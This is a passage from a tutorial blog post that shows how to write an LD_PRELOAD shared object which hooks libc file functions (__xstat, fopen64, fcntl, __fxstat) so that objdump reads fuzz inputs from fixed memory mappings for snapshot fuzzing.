For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

Hello World

The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you running a different objdump than you. But the point of the blogpost is to just show concepts that you can be creative on your own.

I also noticed that the program doesn’t close our input file until the end of execution:

read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++

This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.

Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information great starting point. For starters, let’s just get a Hello, World! shared object loaded.

We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

So our code so far will look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
**> LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64


Disassembly of section .interp:

0000000000000238 <.interp>:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 <_init@@Base-0x34e3>
 248:   78 38                   js     282 <_init@@Base-0x34d6>
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:

It works, now we can start looking for functions to hook.

Looking for Hooks

First thing we need to do, is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. Now we have our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I’m going to assume stat() since we aren’t dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to test to see if we hit it and check if it’s being called for our target input file (now changed to fuzzme).

In order to create a hook, we will follow a pattern where we define a pointer to the real function via a typedef and then we will initialize the pointer as NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RLTD_NEXT, <symbol name>) to get it’s location and change the pointer value to the real symbol address. (This will be more clear later on).

Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
stat_t real_stat = NULL;

// Hook function, objdump will call this stat instead of the real one
int stat(const char *restrict path, struct stat *restrict buf) {
    printf("** stat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

However, if we compile and run that, we don’t ever print and exit so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have 64 variants, such as open() and open64() that are used somewhat interchangably depending on configurations and flags. I tried hooking a stat64() but still had no luck with the hook being reached.

Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    printf("** Hit our __xstat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    // Print the filename requested
    printf("** __xstat() hook called for filename: '%s'\n", __filename);

    // Resolve the address of the real __xstat() on demand and only once
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Call the real __xstat() for the caller so everything keeps going
    return real_xstat(__ver, __filename, __stat_buf);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Ok so now when we run this, and we check for our print statements, things get a little spicy.

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'

So now we can have some fun.

__xstat() Hook

So the purpose of this hook will be to lie to objdump and make it think it successfully stat() the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accomodate that.

My idea at this point was to create a somewhat “legit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

Our constructor function is called when our shared object is loaded
Our constructor sets up a global “legit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
The imaginary fuzzer runs objdump to the snapshot location
Our __xstat() hook updates the the global “legit” stat struct size field and copies the stat struct into the caller’s buffer
The imaginary fuzzer restores the state of objdump to its state at snapshot time
The imaginary fuzzer copies a new input into harness and updates the input size
Our __xstat() hook is called once again, and we repeat step 4, this process occurs over and over forever.

So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, &input, input_size);
  memcpy(config.input_size_location, &input_size, sizeof(size_t));
}

One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.

We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.

So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to mmap() which will allow us to specify an address we want our mapping mapped to with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: “Hmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.

Random sidenote, be careful about arithmetic in definitions and macros as I’ve done here with MAX_INPUT_SIZE, it’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.

Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our “legit” stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that we know will mean that it was called from our constructor, the variable is an int so let’s go with 0x1337 as the special value. That way, in our hook, if we check __ver and it’s 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global “legit” stat struct. When I dumped a normal call by objdump to __xstat() the __version was always a value of 1 so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (NULL == real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();    
}

Now if we run this, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file

This is cool, this means that the objdump devs did something right and their stat() would say: “Hey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!

So we have identified a problem, we need to simulate the fuzzer placing a real input into memory, to do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. So basically, if we compile the shared object and define TEST, our shared object will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing and we can see if our harness is working appropriately. So if we define TEST, we will copy /bin/ed into memory, and we will update our global “legit” stat struct size member, and place the /bin/ed bytes into memory.

You can compile the shared object now to perform the test as follows:

gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ld

We also need to set up our global “legit” stat struct, the code to do that should look as follows. Remember, we pass a fake __ver variable to let the __xstat() hook know that it’s us in the constructor routine, which allows the hook to behave well and give us the stat struct we need:

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    // Create a global stat struct for our file in case someone asks, this way
    // when someone calls stat() or fstat() on our target, we can just return the
    // slightly altered (new size) stat struct &skip the kernel, save syscalls
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

All in all, our entire harness looks like this now:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}

Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

Finding a Way to Hook `openat()`

My non-expert intuition tells me theres probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64 variants as well (open64(), fopen64()). I decided to try the fopen() hooks first:

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

...

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

FILE* fopen64(const char* pathname, const char* mode) {
    printf("** fopen64() called for '%s'\n", pathname);
    exit(0);
}

If we compile and run our exploratory hooks, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'

Bingo, dino DNA.

So now we can flesh that hooked function out a bit to behave how we want.

Refining an `fopen64()` Hook

The definition for fopen64() is: ` FILE *fopen(const char *restrict pathname, const char *restrict mode);. The returned FILE * poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned FILE * as an object to pass to other functions, such as fclose()`. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.

We don’t actually know how the returned FILE * will be used, it may not be used at all, or it may be passed to a function such as fread() so we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * to return to callers of fopen64() with fuzzme as the target input file. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

There is one key difference though. fopen() will actually obtain file descriptor for the underlying file and fmemopen(), since it is not actually openining a file, will not. So somewhere in the FILE * data structure, there is a file descriptor for the underlying file if returned from fopen() and there isn’t one if returned from fmemopen(). This is very important as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE * underlying file descriptor.

My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

You can see we:

Resolve the symbol location if it hasn’t been yet
Check to see if we’re being called on our fuzzing target input file
Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable that is FILE *faked_fp that we initialize to NULL which let’s us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

Running our shared object at this point nets us the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor

My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt

In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)

As we’ve already learned, there is no direct export in libc for fstat(), it’s one of those weird ones like stat() and we actually have to hook __fxstat(). So let’s try and hook that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

...

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    printf("** __fxstat() called for __filedesc: %d\n", __filedesc);
    exit(0);
}

Now we also still have that fcntl() to deal with, luckily that hook is straightforward, if someone asks for the F_GETFD aka, the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was “opened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

...

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

    if (fildes == 1337) {
        return O_RDONLY;
    }

    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }
}

Running this under strace now, the fcntl() call is absent as we would expect:

openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
